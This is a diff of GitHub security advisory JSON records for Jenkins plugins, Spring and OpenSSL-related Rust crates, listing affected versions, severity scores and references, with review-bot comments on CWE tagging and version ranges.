@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px6v-6jhf-j46r", + "modified": "2024-01-30T23:13:45Z", + "published": "2023-02-15T21:30:30Z", + "aliases": [ + "CVE-2023-23847" + ], + "summary": "CSRF vulnerability in Synopsys Jenkins Coverity Plugin", + "details": "A cross-site request forgery (CSRF) vulnerability in Synopsys Jenkins Coverity Plugin 3.0.2 and earlier allows attackers to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:synopsys-coverity" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.0.2" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23847" + }, + { + "type": "WEB", + "url": "https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-Multiple-CVEs-affecting-Coverity-Jenkins-Plugin" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-2793%20(2)" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:13:45Z", + "nvd_published_at": "2023-02-15T19:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/02/GHSA-r7jw-wp68-3xch/GHSA-r7jw-wp68-3xch.json b/advisories/github-reviewed/2023/02/GHSA-r7jw-wp68-3xch/GHSA-r7jw-wp68-3xch.json index d0443846b6192..f207802118b0b 100644 --- a/advisories/github-reviewed/2023/02/GHSA-r7jw-wp68-3xch/GHSA-r7jw-wp68-3xch.json 
+++ b/advisories/github-reviewed/2023/02/GHSA-r7jw-wp68-3xch/GHSA-r7jw-wp68-3xch.json @@ -75,6 +75,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230427-0007/" diff --git a/advisories/github-reviewed/2023/02/GHSA-v5w6-wcm8-jm4q/GHSA-v5w6-wcm8-jm4q.json b/advisories/github-reviewed/2023/02/GHSA-v5w6-wcm8-jm4q/GHSA-v5w6-wcm8-jm4q.json index 093c0bb8cb0e2..daac03de6a62c 100644 --- a/advisories/github-reviewed/2023/02/GHSA-v5w6-wcm8-jm4q/GHSA-v5w6-wcm8-jm4q.json +++ b/advisories/github-reviewed/2023/02/GHSA-v5w6-wcm8-jm4q/GHSA-v5w6-wcm8-jm4q.json @@ -71,6 +71,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" diff --git a/advisories/github-reviewed/2023/02/GHSA-vrh7-x64v-7vxq/GHSA-vrh7-x64v-7vxq.json b/advisories/github-reviewed/2023/02/GHSA-vrh7-x64v-7vxq/GHSA-vrh7-x64v-7vxq.json index 3729d61b7747e..76b439a3ec870 100644 --- a/advisories/github-reviewed/2023/02/GHSA-vrh7-x64v-7vxq/GHSA-vrh7-x64v-7vxq.json +++ b/advisories/github-reviewed/2023/02/GHSA-vrh7-x64v-7vxq/GHSA-vrh7-x64v-7vxq.json @@ -52,6 +52,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0013.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" diff --git a/advisories/github-reviewed/2023/02/GHSA-vxrh-cpg7-8vjr/GHSA-vxrh-cpg7-8vjr.json b/advisories/github-reviewed/2023/02/GHSA-vxrh-cpg7-8vjr/GHSA-vxrh-cpg7-8vjr.json index 6298d6e702965..147f8cf27c7d7 100644 --- a/advisories/github-reviewed/2023/02/GHSA-vxrh-cpg7-8vjr/GHSA-vxrh-cpg7-8vjr.json 
+++ b/advisories/github-reviewed/2023/02/GHSA-vxrh-cpg7-8vjr/GHSA-vxrh-cpg7-8vjr.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0012.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" diff --git a/advisories/github-reviewed/2023/02/GHSA-w67w-mw4j-8qrv/GHSA-w67w-mw4j-8qrv.json b/advisories/github-reviewed/2023/02/GHSA-w67w-mw4j-8qrv/GHSA-w67w-mw4j-8qrv.json index e037dd0c498db..4e65fac0e6fd5 100644 --- a/advisories/github-reviewed/2023/02/GHSA-w67w-mw4j-8qrv/GHSA-w67w-mw4j-8qrv.json +++ b/advisories/github-reviewed/2023/02/GHSA-w67w-mw4j-8qrv/GHSA-w67w-mw4j-8qrv.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0008.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" diff --git a/advisories/github-reviewed/2023/02/GHSA-x4qr-2fvf-3mr5/GHSA-x4qr-2fvf-3mr5.json b/advisories/github-reviewed/2023/02/GHSA-x4qr-2fvf-3mr5/GHSA-x4qr-2fvf-3mr5.json index d68c8977540ed..d68e1d4c3ee21 100644 --- a/advisories/github-reviewed/2023/02/GHSA-x4qr-2fvf-3mr5/GHSA-x4qr-2fvf-3mr5.json +++ b/advisories/github-reviewed/2023/02/GHSA-x4qr-2fvf-3mr5/GHSA-x4qr-2fvf-3mr5.json @@ -114,6 +114,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" diff --git a/advisories/github-reviewed/2023/03/GHSA-564r-hj7v-mcr5/GHSA-564r-hj7v-mcr5.json b/advisories/github-reviewed/2023/03/GHSA-564r-hj7v-mcr5/GHSA-564r-hj7v-mcr5.json index 0867229e9f42d..549697f0ef0e9 100644 --- a/advisories/github-reviewed/2023/03/GHSA-564r-hj7v-mcr5/GHSA-564r-hj7v-mcr5.json 
+++ b/advisories/github-reviewed/2023/03/GHSA-564r-hj7v-mcr5/GHSA-564r-hj7v-mcr5.json @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-expression" }, "ranges": [ { @@ -37,7 +37,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-expression" }, "ranges": [ { @@ -56,7 +56,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-expression" }, "ranges": [ { @@ -78,6 +78,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20861" }, + { + "type": "WEB", + "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1" + }, { "type": "PACKAGE", "url": "https://github.com/spring-projects/spring-framework" diff --git a/advisories/github-reviewed/2023/04/GHSA-7gqc-q9mc-6348/GHSA-7gqc-q9mc-6348.json b/advisories/github-reviewed/2023/04/GHSA-7gqc-q9mc-6348/GHSA-7gqc-q9mc-6348.json new file mode 100644 index 0000000000000..c27e423d0ca75 --- /dev/null +++ b/advisories/github-reviewed/2023/04/GHSA-7gqc-q9mc-6348/GHSA-7gqc-q9mc-6348.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7gqc-q9mc-6348", + "modified": "2024-01-30T23:13:34Z", + "published": "2023-04-12T18:30:35Z", + "aliases": [ + "CVE-2023-30532" + ], + "summary": "Lack of authentication mechanism in Jenkins TurboScript Plugin webhook", + "details": "A missing permission check in Jenkins TurboScript Plugin 1.3 and earlier allows attackers with Item/Read permission to trigger builds of jobs corresponding to the attacker-specified repository.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkinsci.plugins.spoonscript:spoonscript" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30532" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-04-12/#SECURITY-2851" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/04/13/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:13:34Z", + "nvd_published_at": "2023-04-12T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/04/GHSA-wxqc-pxw9-g2p8/GHSA-wxqc-pxw9-g2p8.json b/advisories/github-reviewed/2023/04/GHSA-wxqc-pxw9-g2p8/GHSA-wxqc-pxw9-g2p8.json index 8fce643964010..51fcd4bc3eefe 100644 --- a/advisories/github-reviewed/2023/04/GHSA-wxqc-pxw9-g2p8/GHSA-wxqc-pxw9-g2p8.json +++ b/advisories/github-reviewed/2023/04/GHSA-wxqc-pxw9-g2p8/GHSA-wxqc-pxw9-g2p8.json @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-expression" }, "ranges": [ { 
@@ -37,7 +37,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-expression" }, "ranges": [ { @@ -56,7 +56,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-expression" }, "ranges": [ { diff --git a/advisories/github-reviewed/2023/06/GHSA-39r8-4962-j7vg/GHSA-39r8-4962-j7vg.json b/advisories/github-reviewed/2023/06/GHSA-39r8-4962-j7vg/GHSA-39r8-4962-j7vg.json new file mode 100644 index 0000000000000..66c4d2676416c --- /dev/null +++ b/advisories/github-reviewed/2023/06/GHSA-39r8-4962-j7vg/GHSA-39r8-4962-j7vg.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-39r8-4962-j7vg", + "modified": "2024-01-30T23:12:41Z", + "published": "2023-06-14T15:30:37Z", + "aliases": [ + "CVE-2023-35144" + ], + "summary": "Stored XSS vulnerability in Jenkins Maven Repository Server Plugin", + "details": "Jenkins Maven Repository Server Plugin 1.10 and earlier does not escape project and build display names on the Build Artifacts As Maven Repository page, resulting in a stored cross-site scripting (XSS) vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "jenkins:repository" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35144" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-2951" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:12:41Z", + "nvd_published_at": "2023-06-14T13:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/06/GHSA-7px2-3c2p-q4v4/GHSA-7px2-3c2p-q4v4.json b/advisories/github-reviewed/2023/06/GHSA-7px2-3c2p-q4v4/GHSA-7px2-3c2p-q4v4.json index 9d6b42f57852b..5004816e8dc29 100644 --- a/advisories/github-reviewed/2023/06/GHSA-7px2-3c2p-q4v4/GHSA-7px2-3c2p-q4v4.json +++ b/advisories/github-reviewed/2023/06/GHSA-7px2-3c2p-q4v4/GHSA-7px2-3c2p-q4v4.json 
@@ -49,6 +49,10 @@ "type": "WEB", "url": "https://github.com/brycebaril/node-flatnest/issues/4" }, + { + "type": "WEB", + "url": "https://github.com/brycebaril/node-flatnest/commit/27d569baf9d9d25677640edeaf2d13af165868d6" + }, { "type": "PACKAGE", "url": "https://github.com/brycebaril/node-flatnest" diff --git a/advisories/github-reviewed/2023/06/GHSA-9pvw-8q92-hm9w/GHSA-9pvw-8q92-hm9w.json b/advisories/github-reviewed/2023/06/GHSA-9pvw-8q92-hm9w/GHSA-9pvw-8q92-hm9w.json new file mode 100644 index 0000000000000..fb621277a0f25 --- /dev/null +++ b/advisories/github-reviewed/2023/06/GHSA-9pvw-8q92-hm9w/GHSA-9pvw-8q92-hm9w.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pvw-8q92-hm9w", + "modified": "2024-01-30T23:12:52Z", + "published": "2023-06-14T15:30:37Z", + "aliases": [ + "CVE-2023-35143" + ], + "summary": "Stored XSS vulnerability in Jenkins Maven Repository Server Plugin", + "details": "Jenkins Maven Repository Server Plugin 1.10 and earlier does not escape the versions of build artifacts on the Build Artifacts As Maven Repository page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control maven project versions in `pom.xml`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "jenkins:repository" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35143" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3156" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:12:52Z", + "nvd_published_at": "2023-06-14T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/06/GHSA-rr3p-5fcf-v5m3/GHSA-rr3p-5fcf-v5m3.json b/advisories/github-reviewed/2023/06/GHSA-rr3p-5fcf-v5m3/GHSA-rr3p-5fcf-v5m3.json new file mode 100644 index 0000000000000..699c1d6848b87 --- /dev/null +++ b/advisories/github-reviewed/2023/06/GHSA-rr3p-5fcf-v5m3/GHSA-rr3p-5fcf-v5m3.json 
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rr3p-5fcf-v5m3", + "modified": "2024-01-30T23:13:05Z", + "published": "2023-06-14T15:30:37Z", + "aliases": [ + "CVE-2023-35142" + ], + "summary": "SSL/TLS certificate validation disabled by default in Jenkins Checkmarx Plugin", + "details": "Jenkins Checkmarx Plugin 2022.4.3 and earlier disables SSL/TLS validation for connections to the Checkmarx server by default.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.checkmarx.jenkins:checkmarx" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2023.2.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2022.4.3" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35142" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-2870" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:13:05Z", + "nvd_published_at": "2023-06-14T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/06/GHSA-whgj-6m78-2gg9/GHSA-whgj-6m78-2gg9.json b/advisories/github-reviewed/2023/06/GHSA-whgj-6m78-2gg9/GHSA-whgj-6m78-2gg9.json new file mode 100644 index 0000000000000..a7db7736e2e39 --- /dev/null +++ b/advisories/github-reviewed/2023/06/GHSA-whgj-6m78-2gg9/GHSA-whgj-6m78-2gg9.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whgj-6m78-2gg9", + "modified": "2024-01-30T23:02:44Z", + "published": "2023-06-14T15:30:37Z", + "aliases": [ + "CVE-2023-35147" + ], + "summary": "Arbitrary file read vulnerability in Jenkins AWS CodeCommit Trigger Plugin", + "details": "Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not restrict the AWS SQS queue name path parameter in an HTTP endpoint, allowing attackers with Item/Read permission to obtain the contents of arbitrary files on the Jenkins controller file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:aws-codecommit-trigger" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.0.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35147" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3099" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/06/14/5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:02:36Z", + "nvd_published_at": "2023-06-14T13:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/07/GHSA-27pr-r7hm-c2rc/GHSA-27pr-r7hm-c2rc.json b/advisories/github-reviewed/2023/07/GHSA-27pr-r7hm-c2rc/GHSA-27pr-r7hm-c2rc.json new file mode 100644 index 0000000000000..3d1cef295f1fb --- /dev/null +++ b/advisories/github-reviewed/2023/07/GHSA-27pr-r7hm-c2rc/GHSA-27pr-r7hm-c2rc.json 
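Review bot: `cwe_ids` for GHSA-whgj-6m78-2gg9 is `CWE-732`, but the details describe an unrestricted path parameter that lets a user with Item/Read permission read arbitrary files on the controller, which is path traversal (`CWE-22`) rather than an incorrect permission assignment on a resource. If the tag was carried over from NVD it may be deliberate, but consumers filtering by CWE will not see this as a traversal issue; consider `"CWE-22"` alongside or instead of the current value. The `github_reviewed_at` value (`23:02:36Z`) also differs from `modified` (`23:02:44Z`), whereas every other new record in this commit has the two equal — harmless unless something keys on the pair.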
@@ -0,0 +1,68 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-27pr-r7hm-c2rc",
+ "modified": "2024-01-30T23:03:10Z",
+ "published": "2023-07-19T18:30:55Z",
+ "aliases": [
+ "CVE-2023-32261"
+ ],
+ "summary": "Missing permission check in Jenkins Dimensions Plugin allows enumerating credentials IDs",
+ "details": "Dimensions Plugin 0.9.3 and earlier does not perform a permission check in an HTTP endpoint.\n\nThis allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.\n\nAn enumeration of credentials IDs in Dimensions Plugin 0.9.3.1 requires the appropriate permissions.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:dimensionsscm"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.9.3.1"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.9.3"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32261"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.jenkins.io/dimensionsscm/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://portal.microfocus.com/s/article/KM000019297"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3138"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:03:10Z",
+ "nvd_published_at": "2023-07-19T16:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/07/GHSA-8hc6-w44m-wfxf/GHSA-8hc6-w44m-wfxf.json b/advisories/github-reviewed/2023/07/GHSA-8hc6-w44m-wfxf/GHSA-8hc6-w44m-wfxf.json
new file mode 100644
index 0000000000000..72f0eee4a9bcb
--- /dev/null
+++ b/advisories/github-reviewed/2023/07/GHSA-8hc6-w44m-wfxf/GHSA-8hc6-w44m-wfxf.json
@@ -0,0 +1,68 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8hc6-w44m-wfxf",
+ "modified": "2024-01-30T23:04:11Z",
+ "published": "2023-07-19T18:30:56Z",
+ "aliases": [
+ "CVE-2023-32263"
+ ],
+ "summary": "Potential leak of credentials in Micro Focus Dimensions CM Jenkins Plugin",
+ "details": "A potential vulnerability has been identified in the Micro Focus Dimensions CM Plugin for Jenkins. The vulnerability could be exploited to retrieve a login certificate if an authenticated user is duped into using an attacker-controlled Dimensions CM server. This vulnerability only applies when the Jenkins plugin is configured to use login certificate credentials.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:dimensionsscm"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.8.17"
+ },
+ {
+ "fixed": "0.9.3.1"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.9.3"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32263"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.jenkins.io/dimensionsscm/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://portal.microfocus.com/s/article/KM000019293"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-06-14/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:04:11Z",
+ "nvd_published_at": "2023-07-19T16:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/07/GHSA-mrwq-x4v8-fh7p/GHSA-mrwq-x4v8-fh7p.json b/advisories/github-reviewed/2023/07/GHSA-mrwq-x4v8-fh7p/GHSA-mrwq-x4v8-fh7p.json
index b93db4dbb2c67..0fa9278ce7095 100644
--- a/advisories/github-reviewed/2023/07/GHSA-mrwq-x4v8-fh7p/GHSA-mrwq-x4v8-fh7p.json
+++ b/advisories/github-reviewed/2023/07/GHSA-mrwq-x4v8-fh7p/GHSA-mrwq-x4v8-fh7p.json
@@ -71,6 +71,10 @@
 "type": "WEB",
 "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pygments/PYSEC-2023-117.yaml"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUZO4BQCIY2S2KZYHERQMKURB7AHXDBO/"
+ },
 {
 "type": "WEB",
 "url": "https://pypi.org/project/Pygments/"
diff --git a/advisories/github-reviewed/2023/07/GHSA-pvjf-4hfg-wr84/GHSA-pvjf-4hfg-wr84.json b/advisories/github-reviewed/2023/07/GHSA-pvjf-4hfg-wr84/GHSA-pvjf-4hfg-wr84.json
new file mode 100644
index 0000000000000..ef9ff0b686f43
--- /dev/null
+++ b/advisories/github-reviewed/2023/07/GHSA-pvjf-4hfg-wr84/GHSA-pvjf-4hfg-wr84.json
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pvjf-4hfg-wr84",
+ "modified": "2024-01-30T23:04:31Z",
+ "published": "2023-07-26T15:30:57Z",
+ "aliases": [
+ "CVE-2023-39152"
+ ],
+ "summary": "Incorrect control flow in Jenkins Gradle Plugin breaks credentials masking in the build log",
+ "details": "Always-incorrect control flow implementation in Jenkins Gradle Plugin 2.8 may result in credentials not being masked (i.e., replaced with asterisks) in the build log in some circumstances.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:gradle"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.8.1"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 2.8"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39152"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-07-26/#SECURITY-3208"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2023/07/26/2"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-670"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:04:31Z",
+ "nvd_published_at": "2023-07-26T14:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/07/GHSA-px39-5h8c-j3c8/GHSA-px39-5h8c-j3c8.json b/advisories/github-reviewed/2023/07/GHSA-px39-5h8c-j3c8/GHSA-px39-5h8c-j3c8.json
new file mode 100644
index 0000000000000..206b3aa2eff3a
--- /dev/null
+++ b/advisories/github-reviewed/2023/07/GHSA-px39-5h8c-j3c8/GHSA-px39-5h8c-j3c8.json
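Review bot: The affected range starts at `"introduced": "0"`, which marks every Gradle Plugin release up to 2.8 as vulnerable, while the `details` text names only version 2.8 ("Jenkins Gradle Plugin 2.8 may result in credentials not being masked") rather than the "2.8 and earlier" wording used by the sibling advisories in this commit. If the incorrect control flow first shipped in 2.8, the event should read `"introduced": "2.8"`; if earlier releases are affected too, the details should say so. Verify against the linked SECURITY-3208 entry before merging.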
@@ -0,0 +1,68 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-px39-5h8c-j3c8",
+ "modified": "2024-01-30T23:03:23Z",
+ "published": "2023-07-19T18:30:56Z",
+ "aliases": [
+ "CVE-2023-32262"
+ ],
+ "summary": "Exposure of system-scoped credentials in Jenkins Dimensions Plugin",
+ "details": "Dimensions Plugin 0.9.3 and earlier does not set the appropriate context for credentials lookup, allowing the use of System-scoped credentials otherwise reserved for the global configuration.\n\nThis allows attackers with Item/Configure permission to access and capture credentials they are not entitled to.\n\nDimensions Plugin 0.9.3.1 defines the appropriate context for credentials lookup.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:dimensionsscm"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.9.3.1"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.9.3"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32262"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.jenkins.io/dimensionsscm/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://portal.microfocus.com/s/article/KM000019298"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-3143"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
